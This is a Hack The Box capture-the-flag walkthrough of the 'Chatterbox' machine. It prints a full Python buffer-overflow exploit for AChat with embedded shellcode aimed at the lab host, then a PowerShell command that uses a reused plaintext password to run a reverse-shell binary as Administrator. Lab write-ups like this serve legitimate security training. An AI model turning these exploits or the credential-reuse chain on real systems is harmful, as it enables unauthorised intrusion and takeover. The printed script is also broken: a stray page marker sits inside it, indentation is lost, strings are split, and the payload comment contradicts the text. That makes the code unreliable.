CTF Walkthroughs, Hack The Box

Hack The Box – Chatterbox Walkthrough

Introduction

This was an easy Windows box that involved exploiting a remote buffer overflow vulnerability in the Chatterbox application to gain initial access and using cached autologon credentials to execute a reverse shell as the Administrator user and escalate privileges.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests

The next thing to do will be to enumerate the AChat service on port 9255/9256.

Enumerating AChat

AChat is an application that enables you to chat on your local network (LAN). Using the SeachSploit tool to identify any known vulnerabilities in AChat:

It appears that AChat is affected by a remote buffer overflow vulnerability, mirroring the exploit:

It appears that for this exploit to run, all that it requires is shellcode to be generated using MSFVenom and added to the Python script.

Exploiting AChat Buffer Overflow

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -a to specify the architecture, in this case, x86
  • -p to specify the payload type, in this case, the Windows TCP Reverse Shelll
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -e to specify the encoder, in this case, unicode_mixed
  • -b to specify the bad characters, in this case, simple using the ones provided in the exploit

Inserting the generated shelllcode in the Python script:

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/
unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c
\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f
\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2
\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5
\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8
\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb
\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe
\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x67\x78\x64\x42"
buf += b"\x59\x70\x4b\x50\x6d\x30\x61\x50\x32\x69\x69\x55\x30"
buf += b"\x31\x75\x70\x61\x54\x54\x4b\x30\x50\x50\x30\x52\x6b"
buf += b"\x62\x32\x4a\x6c\x64\x4b\x52\x32\x5a\x74\x64\x4b\x61"
buf += b"\x62\x4c\x68\x7a\x6f\x54\x77\x6e\x6a\x4f\x36\x6d\x61"
buf += b"\x6b\x4f\x54\x6c\x4d\x6c\x53\x31\x61\x6c\x7a\x62\x6e"
buf += b"\x4c\x4f\x30\x55\x71\x36\x6f\x5a\x6d\x59\x71\x37\x57"
buf += b"\x59\x52\x4c\x32\x62\x32\x70\x57\x34\x4b\x50\x52\x7a"
buf += b"\x70\x32\x6b\x4f\x5a\x4d\x6c\x64\x4b\x50\x4c\x6e\x31"
buf += b"\x31\x68\x6a\x43\x50\x48\x69\x71\x7a\x31\x42\x31\x74"
buf += b"\x4b\x61\x49\x6b\x70\x39\x71\x6a\x33\x54\x4b\x70\x49"
buf += b"\x7a\x78\x6a\x43\x6e\x5a\x4f\x59\x74\x4b\x4e\x54\x72"
buf += b"\x6b\x6b\x51\x67\x66\x6e\x51\x69\x6f\x56\x4c\x79\x31"
buf += b"\x56\x6f\x6a\x6d\x79\x71\x59\x37\x4c\x78\x49\x50\x62"
buf += b"\x55\x58\x76\x79\x73\x43\x4d\x6c\x38\x4d\x6b\x73\x4d"
buf += b"\x4f\x34\x61\x65\x49\x54\x6e\x78\x34\x4b\x4f\x68\x4d"
buf += b"\x54\x69\x71\x59\x43\x50\x66\x42\x6b\x4a\x6c\x6e\x6b"
buf += b"\x62\x6b\x31\x48\x6d\x4c\x6d\x31\x46\x73\x54\x4b\x6d"
buf += b"\x34\x32\x6b\x7a\x61\x66\x70\x42\x69\x6f\x54\x4d\x54"
buf += b"\x6c\x64\x31\x4b\x61\x4b\x70\x61\x61\x49\x51\x4a\x6e"
buf += b"\x71\x79\x6f\x37\x70\x61\x4f\x6f\x6f\x6f\x6a\x64\x4b"
buf += b"\x6c\x52\x48\x6b\x74\x4d\x61\x4d\x52\x48\x50\x33\x50"
buf += b"\x32\x49\x70\x4d\x30\x30\x68\x63\x47\x64\x33\x50\x32"
buf += b"\x51\x4f\x30\x54\x31\x58\x4e\x6c\x31\x67\x4c\x66\x6c"
buf += b"\x47\x39\x6f\x66\x75\x54\x78\x42\x70\x4d\x31\x79\x70"
buf += b"\x4d\x30\x6b\x79\x56\x64\x72\x34\x62\x30\x62\x48\x4d"
buf += b"\x59\x43\x50\x42\x4b\x6b\x50\x39\x6f\x78\x55\x62\x30"
buf += b"\x70\x50\x32\x30\x30\x50\x71\x30\x52\x30\x61\x30\x6e"
buf += b"\x70\x51\x58\x4a\x4a\x4c\x4f\x37\x6f\x39\x50\x4b\x4f"
buf += b"\x79\x45\x73\x67\x61\x5a\x6a\x65\x53\x38\x4c\x4a\x7a"
buf += b"\x6a\x4a\x6e\x59\x72\x42\x48\x69\x72\x69\x70\x4d\x31"
buf += b"\x37\x4b\x32\x69\x79\x56\x30\x6a\x4a\x70\x51\x46\x52"
buf += b"\x37\x61\x58\x54\x59\x43\x75\x52\x54\x61\x51\x39\x6f"
buf += b"\x68\x55\x33\x55\x59\x30\x30\x74\x4a\x6c\x39\x6f\x30"
buf += b"\x4e\x49\x78\x32\x55\x38\x6c\x71\x58\x7a\x50\x58\x35"
buf += b"\x67\x32\x30\x56\x79\x6f\x37\x65\x6f\x78\x63\x33\x62"
buf += b"\x4d\x52\x44\x69\x70\x75\x39\x47\x73\x4e\x77\x4e\x77"
buf += b"\x42\x37\x6e\x51\x6b\x46\x32\x4a\x6c\x52\x50\x59\x71"
buf += b"\x46\x67\x72\x4b\x4d\x73\x36\x59\x37\x6e\x64\x4c\x64"
buf += b"\x6f\x4c\x4a\x61\x79\x71\x34\x4d\x71\x34\x4f\x34\x4a"
buf += b"\x70\x45\x76\x79\x70\x6e\x64\x50\x54\x70\x50\x4e\x76"
buf += b"\x30\x56\x62\x36\x51\x36\x6e\x76\x30\x4e\x31\x46\x51"
buf += b"\x46\x6e\x73\x72\x36\x53\x38\x54\x39\x58\x4c\x4d\x6f"
buf += b"\x75\x36\x39\x6f\x67\x65\x35\x39\x37\x70\x50\x4e\x6f"
buf += b"\x66\x6d\x76\x4b\x4f\x6c\x70\x53\x38\x5a\x68\x51\x77"
buf += b"\x4b\x6d\x4f\x70\x79\x6f\x7a\x35\x75\x6b\x58\x70\x54"
buf += b"\x75\x34\x62\x4f\x66\x72\x48\x75\x56\x36\x35\x57\x4d"
buf += b"\x53\x6d\x6b\x4f\x78\x55\x6f\x4c\x4c\x46\x73\x4c\x6c"
buf += b"\x4a\x31\x70\x69\x6b\x57\x70\x51\x65\x59\x75\x35\x6b"
buf += b"\x71\x37\x4c\x53\x54\x32\x42\x4f\x70\x6a\x79\x70\x6e"
buf += b"\x73\x6b\x4f\x68\x55\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58
\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43
\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
5/7
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Running the exploit:

A callback on the Netcat listener was received, granting a reverse shell as the Alfred user.

Privilege Escalation

Using the Certutil utility and the Python simple web server to transfer the WinPEAS script to the victime machine:

Running the WinPEAS enumeration script:

It appears autologon credentials for the Alfred user are stored on the machine, the same credentials could possible have been used for the Administrator user:

Since there are no open services that would allow to remotely connect to the box as the Administrator user, such as RDP or WinRM, in order to exploit this, the PowerShell System.Management.Automation utility, which allows to execute scripts or binaries as a different user, can be leveraged. Clear-text credentials for the user can be provided when executing the command, which will be encrypted during execution.

Generating a reverse shell using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows TCP Reverse Shelll
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

Using the Certutil utility and the Python simple web server to transfer the reverse shell to the victim machine:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

The following PowerShell command will execute the reverse shell as the Administrator user, if the credentials provided are correct:

powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);Start-Process -FilePath "shell.exe" -Credential $creds"

The command was executed successfully, confirming that the same credentials for Alfred were used for the Administrator user as well, and a callback on the Netcat listener was received, granting an administrative-level shell.

Conclusion

Although the exploitation part of this challenge was quite trivial (it can be exploited manually as well although at the time since I had already done a ton of BOF practice for my OSCP I didn’t feel like doing so), the privilege escalation is quite interesting, as it shows how cached credentials can be very dangerous, especially when they are being reused for multiple users..